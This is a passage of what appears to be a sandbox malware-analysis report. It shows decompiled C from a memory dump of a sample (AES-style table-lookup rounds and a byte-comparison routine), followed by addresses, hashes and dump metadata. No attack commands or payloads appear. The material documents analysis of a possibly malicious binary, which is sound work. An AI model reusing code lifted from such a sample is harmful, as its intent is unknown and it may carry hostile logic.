                    										 *(_t555 - 8) =  *(0x466700 + ( *(0x467b00 + ( *(_t555 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x466b00 + ( *(0x467b00 + ( *(_t555 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x466f00 + ( *(0x467b00 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x467300 + ( *(0x467b00 + ( *(_t555 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
                    										_t494 =  *_t555;
                    										 *(_t555 - 4) =  *(0x466700 + ( *(0x467b00 + ( *(_t555 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x466b00 + ( *(0x467b00 + ( *(_t555 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x466f00 + ( *(0x467b00 + (_t492 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x467300 + ( *(0x467b00 + ( *(_t555 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
                    										_t496 = _t555[4];
                    										 *_t555 =  *(0x466700 + ( *(0x467b00 + ( *_t555 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x466b00 + ( *(0x467b00 + ( *_t555 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x466f00 + ( *(0x467b00 + (_t494 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x467300 + ( *(0x467b00 + ( *_t555 & 0x000000ff) * 4) & 0x000000ff) * 4);
                    										_t536 = _t536 + 1;
                    										_t555[4] =  *(0x466700 + ( *(0x467b00 + (_t555[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x466b00 + ( *(0x467b00 + (_t555[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x466f00 + ( *(0x467b00 + (_t496 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x467300 + ( *(0x467b00 + (_t555[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
                    									} while (_t536 <  *(_t546 + 0xf0));
                    								}
                    							}
                    							_t489 =  *((intOrPtr*)(_t560 + 0x1c));
                    							_t437 = _t546;
                    							_pop(_t537);
                    							if(_t437 != 0) {
                    								_t270 = _t437 + 0xf8;
                    								_push(0x10);
                    								if(_t489 == 0) {
                    									_push(0);
                    									_push(_t270);
                    									E004368A0(_t537);
                    								} else {
                    									_push(_t489);
                    									_push(_t270);
                    									E00436320();
                    								}
                    								return 0;
                    							} else {
                    								return 0xffffff53;
                    							}
                    						} else {
                    							return 0xffffff53;
                    						}
                    					}
                    				}
                    			}



















































                    0x00426dbb
                    0x00426dc0
                    0x00426dc4
                    0x00426dc8
                    0x00426dd4
                    0x00426ddb
                    0x00426de1
                    0x00426deb
                    0x00426df0
                    0x00426df6
                    0x0042707b
                    0x0042707e
                    0x0042707e
                    0x004270d9
                    0x004270db
                    0x004270de
                    0x004270e3
                    0x004270e5
                    0x004270e8
                    0x004270ed
                    0x004270f0
                    0x004270f1
                    0x004270f1
                    0x004270f4
                    0x0042713b
                    0x00427141
                    0x00427144
                    0x00427147
                    0x0042714c
                    0x0042714e
                    0x00427154
                    0x00427156
                    0x0042715e
                    0x00427161
                    0x00000000
                    0x00426dfc
                    0x00426dff
                    0x00426f72
                    0x00426f75
                    0x00426f75
                    0x00426fd4
                    0x00426fd6
                    0x00426fd8
                    0x00426fdb
                    0x00426fde
                    0x00426fe5
                    0x00426fe8
                    0x00426feb
                    0x00426fec
                    0x00426fef
                    0x00426ff7
                    0x00426ff9
                    0x00426ffc
                    0x00426fff
                    0x00427046
                    0x0042704c
                    0x0042704f
                    0x00427052
                    0x00427058
                    0x0042705a
                    0x00427060
                    0x00427062
                    0x0042706a
                    0x0042706d
                    0x00000000
                    0x00426e05
                    0x00426e08
                    0x00426e15
                    0x00426e18
                    0x00426e18
                    0x00426e77
                    0x00426e79
                    0x00426e7b
                    0x00426e7e
                    0x00426e81
                    0x00426e88
                    0x00426e8b
                    0x00426e8e
                    0x00426e8f
                    0x00426e8f
                    0x00426ecc
                    0x00426edc
                    0x00426edf
                    0x00426ee1
                    0x00426ee3
                    0x00426ee6
                    0x00426ee9
                    0x00426ef0
                    0x00426ef3
                    0x00426ef6
                    0x00426f3d
                    0x00426f43
                    0x00426f46
                    0x00426f49
                    0x00426f4f
                    0x00426f51
                    0x00426f57
                    0x00426f59
                    0x00426f61
                    0x00426f64
                    0x00427166
                    0x00427166
                    0x0042716c
                    0x00427171
                    0x0042717d
                    0x00427180
                    0x00427185
                    0x00427187
                    0x0042718a
                    0x0042718c
                    0x0042718f
                    0x00427191
                    0x00427194
                    0x0042719a
                    0x0042719d
                    0x004271a3
                    0x004271a9
                    0x004271ae
                    0x004271b1
                    0x004271b3
                    0x004271b5
                    0x004271b8
                    0x004271bb
                    0x004271bd
                    0x004271c3
                    0x004271c6
                    0x004271c9
                    0x004271cd
                    0x004271d3
                    0x004271d3
                    0x004271da
                    0x004271e0
                    0x004271e0
                    0x004271e3
                    0x00427217
                    0x00427241
                    0x00427270
                    0x0042729a
                    0x004272c9
                    0x004272f3
                    0x00427344
                    0x00427345
                    0x00427348
                    0x004271e0
                    0x004271da
                    0x00427354
                    0x00427358
                    0x0042735a
                    0x004273b3
                    0x004273bb
                    0x004273c1
                    0x004273c5
                    0x004273d0
                    0x004273d2
                    0x004273d3
                    0x004273c7
                    0x004273c7
                    0x004273c8
                    0x004273c9
                    0x004273c9
                    0x004273dd
                    0x004273b5
                    0x004273ba
                    0x004273ba
                    0x00426e0a
                    0x00426e14
                    0x00426e14
                    0x00426e08
                    0x00426dff

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6d9fa182ccafb49cd0e1ab028b17692eb357ac589275f3099805a3dd2ed0460d
                    • Instruction ID: 7f0d76f331ed66bdb5cb36d569302a6863e21a4941b49037aa567ff47ae53bbe
                    • Opcode Fuzzy Hash: 6d9fa182ccafb49cd0e1ab028b17692eb357ac589275f3099805a3dd2ed0460d
                    • Instruction Fuzzy Hash: 8F02DE717242518FC319CF2EEC9057AB7E1AB8D301745863EE885C7381EB78E921DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042682C(signed int* __ecx, void* __edx) {
                    				void* _t227;
                    				signed int _t245;
                    				signed int _t246;
                    				signed int _t274;
                    				unsigned int _t394;
                    				int _t407;
                    				unsigned int _t410;
                    				signed char _t416;
                    				unsigned int _t444;
                    				unsigned int _t460;
                    				unsigned int _t478;
                    				unsigned int _t506;
                    				signed int _t510;
                    				unsigned int _t513;
                    				unsigned int _t514;
                    				unsigned int _t521;
                    				void* _t525;
                    				unsigned int _t526;
                    				signed int _t528;
                    				signed int _t529;
                    				signed int* _t530;
                    				signed int _t532;
                    				int _t534;
                    				signed int* _t535;
                    				signed int* _t536;
                    				unsigned int _t540;
                    				void* _t542;
                    				void* _t543;
                    
                    				_t535 = __ecx;
                    				_t525 = __edx;
                    				_t540 =  *(__ecx + 0xf0) >> 1;
                    				if(_t540 <= 7 && _t540 != 0) {
                    					_t407 = 4;
                    					E00436320(_t542 + 0x28, __edx, _t407);
                    					E00436320(_t542 + 0x34, _t525 + 4, _t407);
                    					E00436320(_t542 + 0x3c, _t525 + 8, _t407);
                    					E00436320(_t542 + 0x44, _t525 + 0xc, _t407);
                    					_t543 = _t542 + 0x30;
                    					 *(_t543 + 0x28) = E00426709( *((intOrPtr*)(_t542 + 0x50))) ^ _t535[1];
                    					 *(_t543 + 0x1c) = E00426709( *(_t543 + 0x1c)) ^ _t535[2];
                    					 *(_t543 + 0x20) = E00426709( *(_t543 + 0x18)) ^ _t535[3];
                    					_t245 = E00426709( *(_t543 + 0x24));
                    					_t246 = E0042680F();
                    					_t526 =  *(_t543 + 0x1c);
                    					_t410 = _t245 ^  *_t535 | _t246;
                    					_t506 =  *(_t543 + 0x20);
                    					 *(_t543 + 0x20) =  *(0x467f00 + (_t526 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + ( *(_t543 + 0x28) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + (_t410 >> 0x18) * 4) ^  *(0x468300 + (_t506 & 0x000000ff) * 4) ^ _t535[4];
                    					 *(_t543 + 0x18) =  *(0x467f00 + (_t506 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + (_t526 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + ( *(_t543 + 0x28) >> 0x18) * 4) ^  *(0x468300 + (_t410 & 0x000000ff) * 4) ^ _t535[5];
                    					 *(_t543 + 0x10) =  *(0x467b00 + (_t506 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + (_t526 >> 0x18) * 4);
                    					 *(_t543 + 0x10) =  *(_t543 + 0x10) ^  *(0x467f00 + (_t410 >> 0x00000008 & 0x000000ff) * 4);
                    					_t444 =  *(_t543 + 0x28);
                    					_t528 =  *(_t543 + 0x10) ^  *(0x468300 + (_t444 & 0x000000ff) * 4);
                    					 *(_t543 + 0x10) = _t528;
                    					 *(_t543 + 0x10) = _t528 ^ _t535[6];
                    					_t510 =  *(0x467700 + (_t506 >> 0x18) * 4) ^  *(0x467f00 + (_t444 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + (_t410 >> 0x00000010 & 0x000000ff) * 4);
                    					_t274 =  *(_t543 + 0x1c) & 0x000000ff;
                    					while(1) {
                    						_t512 = _t510 ^  *(0x468300 + _t274 * 4) ^ _t535[7];
                    						_t536 =  &(_t535[8]);
                    						 *(_t543 + 0x24) = _t536;
                    						 *(_t543 + 0x14) = _t510 ^  *(0x468300 + _t274 * 4) ^ _t535[7];
                    						_t540 = _t540 - 1;
                    						if(_t540 == 0) {
                    							break;
                    						}
                    						_t529 =  *(_t543 + 0x10);
                    						_t513 =  *(_t543 + 0x20);
                    						 *(_t543 + 0x1c) =  *(0x467f00 + (_t529 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + ( *(_t543 + 0x18) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + (_t513 >> 0x18) * 4) ^  *(0x468300 + ( *(_t543 + 0x14) & 0x000000ff) * 4) ^  *_t536;
                    						 *(_t543 + 0x28) =  *(0x467f00 + ( *(_t543 + 0x14) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + (_t529 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + ( *(_t543 + 0x18) >> 0x18) * 4) ^  *(0x468300 + (_t513 & 0x000000ff) * 4) ^ _t536[1];
                    						 *(_t543 + 0x14) =  *(_t543 + 0x14) >> 0x18;
                    						_t460 = _t513;
                    						_t514 =  *(_t543 + 0x18);
                    						_t416 =  *(0x467b00 + ( *(_t543 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + (_t529 >> 0x18) * 4) ^  *(0x467f00 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x468300 + (_t514 & 0x000000ff) * 4) ^ _t536[2];
                    						_t530 =  *(_t543 + 0x24);
                    						_t521 =  *(0x467700 +  *(_t543 + 0x14) * 4) ^  *(0x467f00 + (_t514 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + (_t460 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x468300 + (_t529 & 0x000000ff) * 4) ^ _t536[3];
                    						 *(_t543 + 0x20) =  *(0x467f00 + (_t416 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + ( *(_t543 + 0x28) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + ( *(_t543 + 0x1c) >> 0x18) * 4) ^  *(0x468300 + (_t521 & 0x000000ff) * 4) ^ _t530[4];
                    						_t535 = _t530;
                    						 *(_t543 + 0x18) =  *(0x467f00 + (_t521 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + (_t416 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + ( *(_t543 + 0x28) >> 0x18) * 4) ^  *(0x468300 + ( *(_t543 + 0x1c) & 0x000000ff) * 4) ^ _t535[5];
                    						 *(_t543 + 0x10) =  *(0x467b00 + (_t521 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x467700 + (_t416 >> 0x18) * 4);
                    						 *(_t543 + 0x10) =  *(_t543 + 0x10) ^  *(0x467f00 + ( *(_t543 + 0x1c) >> 0x00000008 & 0x000000ff) * 4);
                    						_t478 =  *(_t543 + 0x28);
                    						_t532 =  *(_t543 + 0x10) ^  *(0x468300 + (_t478 & 0x000000ff) * 4);
                    						 *(_t543 + 0x10) = _t532;
                    						 *(_t543 + 0x10) = _t532 ^ _t535[6];
                    						_t510 =  *(0x467700 + (_t521 >> 0x18) * 4) ^  *(0x467f00 + (_t478 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x467b00 + ( *(_t543 + 0x1c) >> 0x00000010 & 0x000000ff) * 4);
                    						_t274 = _t416 & 0x000000ff;
                    					}
                    					_t533 = _t536;
                    					_t417 =  *(_t543 + 0x20);
                    					 *(_t543 + 0x24) = E00426709( *(0x468300 + ( *(_t543 + 0x18) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467700 + ( *(_t543 + 0x10) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x467f00 + ( *(_t543 + 0x20) >> 0x18) * 4) & 0xff000000 ^  *(0x467b00 + (_t512 & 0x000000ff) * 4) & 0x000000ff ^  *_t536);
                    					 *(_t543 + 0x20) = E00426709( *(0x468300 + ( *(_t543 + 0x10) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467700 + ( *(_t543 + 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x467f00 + ( *(_t543 + 0x18) >> 0x18) * 4) & 0xff000000 ^  *(0x467b00 + (_t417 & 0x000000ff) * 4) & 0x000000ff ^ _t533[1]);
                    					 *(_t543 + 0x1c) = E00426709( *(0x468300 + ( *(_t543 + 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467f00 + ( *(_t543 + 0x10) >> 0x18) * 4) & 0xff000000 ^  *(0x467700 + (_t417 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x467b00 + ( *(_t543 + 0x18) & 0x000000ff) * 4) & 0x000000ff ^ _t533[2]);
                    					_t394 = E00426709( *(0x468300 + (_t417 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467f00 + ( *(_t543 + 0x14) >> 0x18) * 4) & 0xff000000 ^  *(0x467700 + ( *(_t543 + 0x18) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x467b00 + ( *(_t543 + 0x10) & 0x000000ff) * 4) & 0x000000ff ^ _t533[3]);
                    					_t538 =  *((intOrPtr*)(_t543 + 0x30));
                    					_t534 = 4;
                    					 *(_t543 + 0x18) = _t394;
                    					E00436320( *((intOrPtr*)(_t543 + 0x30)), _t543 + 0x24, _t534);
                    					E00436320( *((intOrPtr*)(_t543 + 0x30)) + 4, _t543 + 0x30, _t534);
                    					E00436320(_t538 + 8, _t543 + 0x38, _t534);
                    					return E00436320(_t538 + 0xc, _t543 + 0x40, _t534);
                    				}
                    				return _t227;
                    			}































                    0x00426831
                    0x00426834
                    0x0042683c
                    0x00426841
                    0x00426852
                    0x0042685a
                    0x00426869
                    0x00426878
                    0x00426887
                    0x00426890
                    0x0042689f
                    0x004268af
                    0x004268bf
                    0x004268c3
                    0x004268cc
                    0x004268d1
                    0x004268d5
                    0x004268f0
                    0x0042691b
                    0x00426958
                    0x00426975
                    0x00426996
                    0x0042699a
                    0x004269a8
                    0x004269b1
                    0x004269b8
                    0x004269c9
                    0x004269d4
                    0x00426be3
                    0x00426bea
                    0x00426bed
                    0x00426bf0
                    0x00426bf4
                    0x00426bf8
                    0x00426bfb
                    0x00000000
                    0x00000000
                    0x004269dc
                    0x004269f9
                    0x00426a27
                    0x00426a69
                    0x00426a72
                    0x00426a85
                    0x00426a87
                    0x00426aaa
                    0x00426ad1
                    0x00426ade
                    0x00426b1f
                    0x00426b32
                    0x00426b65
                    0x00426b7f
                    0x00426b9f
                    0x00426ba3
                    0x00426bb1
                    0x00426bba
                    0x00426bc1
                    0x00426bd9
                    0x00426be0
                    0x00426be0
                    0x00426c0d
                    0x00426c0f
                    0x00426c5f
                    0x00426cb9
                    0x00426d16
                    0x00426d67
                    0x00426d6c
                    0x00426d72
                    0x00426d73
                    0x00426d7e
                    0x00426d8d
                    0x00426d9c
                    0x00000000
                    0x00426db3
                    0x00426dba

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac092cd7ad4153524751fd0941de4d9513d39143897adb37e34dab78121cb4a6
                    • Instruction ID: d8ea36b1c765d2cafa20db404465668d85f4bd4774a916ec58d19722c9b03ffe
                    • Opcode Fuzzy Hash: ac092cd7ad4153524751fd0941de4d9513d39143897adb37e34dab78121cb4a6
                    • Instruction Fuzzy Hash: 32F180716282558FC304DF1DE8A18ABB3E0FB89305B450A2EF582C7391DB79F615CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00437743(void* __edx, void* __esi) {
                    				signed int _t192;
                    				signed char _t193;
                    				signed char _t194;
                    				signed char _t195;
                    				signed char _t196;
                    				signed char _t198;
                    				signed int _t241;
                    				void* _t287;
                    				void* _t292;
                    				void* _t294;
                    				void* _t296;
                    				void* _t298;
                    				void* _t300;
                    				void* _t302;
                    				void* _t304;
                    				void* _t306;
                    				void* _t308;
                    				void* _t310;
                    				void* _t312;
                    				void* _t314;
                    				void* _t316;
                    				void* _t318;
                    				void* _t320;
                    				void* _t322;
                    				void* _t324;
                    				void* _t326;
                    				void* _t327;
                    
                    				_t327 = __esi;
                    				_t287 = __edx;
                    				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                    					_t241 = 0;
                    					L15:
                    					if(_t241 != 0) {
                    						goto L2;
                    					}
                    					_t193 =  *(_t327 - 0x1a);
                    					if(_t193 ==  *(_t287 - 0x1a)) {
                    						_t241 = 0;
                    						L26:
                    						if(_t241 != 0) {
                    							goto L2;
                    						}
                    						_t194 =  *(_t327 - 0x16);
                    						if(_t194 ==  *(_t287 - 0x16)) {
                    							_t241 = 0;
                    							L37:
                    							if(_t241 != 0) {
                    								goto L2;
                    							}
                    							_t195 =  *(_t327 - 0x12);
                    							if(_t195 ==  *(_t287 - 0x12)) {
                    								_t241 = 0;
                    								L48:
                    								if(_t241 != 0) {
                    									goto L2;
                    								}
                    								_t196 =  *(_t327 - 0xe);
                    								if(_t196 ==  *(_t287 - 0xe)) {
                    									_t241 = 0;
                    									L59:
                    									if(_t241 != 0) {
                    										goto L2;
                    									}
                    									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                    										_t241 = 0;
                    										L70:
                    										if(_t241 != 0) {
                    											goto L2;
                    										}
                    										_t198 =  *(_t327 - 6);
                    										if(_t198 ==  *(_t287 - 6)) {
                    											_t241 = 0;
                    											L81:
                    											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                    											}
                    											goto L2;
                    										}
                    										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                    										if(_t292 == 0) {
                    											L74:
                    											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                    											if(_t294 == 0) {
                    												L76:
                    												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                    												if(_t296 == 0) {
                    													L78:
                    													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                    													if(_t241 != 0) {
                    														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                    													}
                    													goto L81;
                    												}
                    												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                    												if(_t241 != 0) {
                    													goto L2;
                    												}
                    												goto L78;
                    											}
                    											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                    											if(_t241 != 0) {
                    												goto L2;
                    											}
                    											goto L76;
                    										}
                    										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                    										if(_t241 != 0) {
                    											goto L2;
                    										}
                    										goto L74;
                    									}
                    									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                    									if(_t298 == 0) {
                    										L63:
                    										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                    										if(_t300 == 0) {
                    											L65:
                    											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                    											if(_t302 == 0) {
                    												L67:
                    												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                    												if(_t241 != 0) {
                    													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                    												}
                    												goto L70;
                    											}
                    											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                    											if(_t241 != 0) {
                    												goto L2;
                    											}
                    											goto L67;
                    										}
                    										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                    										if(_t241 != 0) {
                    											goto L2;
                    										}
                    										goto L65;
                    									}
                    									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                    									if(_t241 != 0) {
                    										goto L2;
                    									}
                    									goto L63;
                    								}
                    								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                    								if(_t304 == 0) {
                    									L52:
                    									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                    									if(_t306 == 0) {
                    										L54:
                    										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                    										if(_t308 == 0) {
                    											L56:
                    											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                    											if(_t241 != 0) {
                    												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                    											}
                    											goto L59;
                    										}
                    										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                    										if(_t241 != 0) {
                    											goto L2;
                    										}
                    										goto L56;
                    									}
                    									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                    									if(_t241 != 0) {
                    										goto L2;
                    									}
                    									goto L54;
                    								}
                    								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                    								if(_t241 != 0) {
                    									goto L2;
                    								}
                    								goto L52;
                    							}
                    							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                    							if(_t310 == 0) {
                    								L41:
                    								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                    								if(_t312 == 0) {
                    									L43:
                    									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                    									if(_t314 == 0) {
                    										L45:
                    										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                    										if(_t241 != 0) {
                    											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                    										}
                    										goto L48;
                    									}
                    									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                    									if(_t241 != 0) {
                    										goto L2;
                    									}
                    									goto L45;
                    								}
                    								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                    								if(_t241 != 0) {
                    									goto L2;
                    								}
                    								goto L43;
                    							}
                    							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                    							if(_t241 != 0) {
                    								goto L2;
                    							}
                    							goto L41;
                    						}
                    						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                    						if(_t316 == 0) {
                    							L30:
                    							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                    							if(_t318 == 0) {
                    								L32:
                    								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                    								if(_t320 == 0) {
                    									L34:
                    									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                    									if(_t241 != 0) {
                    										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                    									}
                    									goto L37;
                    								}
                    								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                    								if(_t241 != 0) {
                    									goto L2;
                    								}
                    								goto L34;
                    							}
                    							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                    							if(_t241 != 0) {
                    								goto L2;
                    							}
                    							goto L32;
                    						}
                    						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                    						if(_t241 != 0) {
                    							goto L2;
                    						}
                    						goto L30;
                    					}
                    					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                    					if(_t322 == 0) {
                    						L19:
                    						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                    						if(_t324 == 0) {
                    							L21:
                    							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                    							if(_t326 == 0) {
                    								L23:
                    								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                    								if(_t241 != 0) {
                    									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                    								}
                    								goto L26;
                    							}
                    							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                    							if(_t241 != 0) {
                    								goto L2;
                    							}
                    							goto L23;
                    						}
                    						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                    						if(_t241 != 0) {
                    							goto L2;
                    						}
                    						goto L21;
                    					}
                    					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                    					if(_t241 != 0) {
                    						goto L2;
                    					}
                    					goto L19;
                    				} else {
                    					__edi = __al & 0x000000ff;
                    					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                    					if(__edi == 0) {
                    						L8:
                    						__edi =  *(__esi - 0x1d) & 0x000000ff;
                    						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                    						if(__edi == 0) {
                    							L10:
                    							__edi =  *(__esi - 0x1c) & 0x000000ff;
                    							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                    							if(__edi == 0) {
                    								L12:
                    								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                    								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                    								if(__ecx != 0) {
                    									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                    								}
                    								goto L15;
                    							}
                    							0 = 0 | __edi > 0x00000000;
                    							__ecx = (__edi > 0) * 2 != 1;
                    							if((__edi > 0) * 2 != 1) {
                    								L2:
                    								_t192 = _t241;
                    								return _t192;
                    							}
                    							goto L12;
                    						}
                    						0 = 0 | __edi > 0x00000000;
                    						__ecx = (__edi > 0) * 2 != 1;
                    						if((__edi > 0) * 2 != 1) {
                    							goto L2;
                    						}
                    						goto L10;
                    					}
                    					0 = 0 | __edi > 0x00000000;
                    					__ecx = (__edi > 0) * 2 != 1;
                    					if((__edi > 0) * 2 != 1) {
                    						goto L2;
                    					}
                    					goto L8;
                    				}
                    			}






























                    0x00437743
                    0x00437743
                    0x00437749
                    0x004377d0
                    0x004377d2
                    0x004377d4
                    0x00000000
                    0x00000000
                    0x004377da
                    0x004377e0
                    0x00437867
                    0x00437869
                    0x0043786b
                    0x00000000
                    0x00000000
                    0x00437871
                    0x00437877
                    0x004378fe
                    0x00437900
                    0x00437902
                    0x00000000
                    0x00000000
                    0x00437908
                    0x0043790e
                    0x00437995
                    0x00437997
                    0x00437999
                    0x00000000
                    0x00000000
                    0x0043799f
                    0x004379a5
                    0x00437a2c
                    0x00437a2e
                    0x00437a30
                    0x00000000
                    0x00000000
                    0x00437a3c
                    0x00437ac4
                    0x00437ac6
                    0x00437ac8
                    0x00000000
                    0x00000000
                    0x00437ace
                    0x00437ad4
                    0x00437b5b
                    0x00437b5d
                    0x00437b5f
                    0x00437b5f
                    0x00000000
                    0x00437b5f
                    0x00437ae1
                    0x00437ae3
                    0x00437afb
                    0x00437b03
                    0x00437b05
                    0x00437b1d
                    0x00437b25
                    0x00437b27
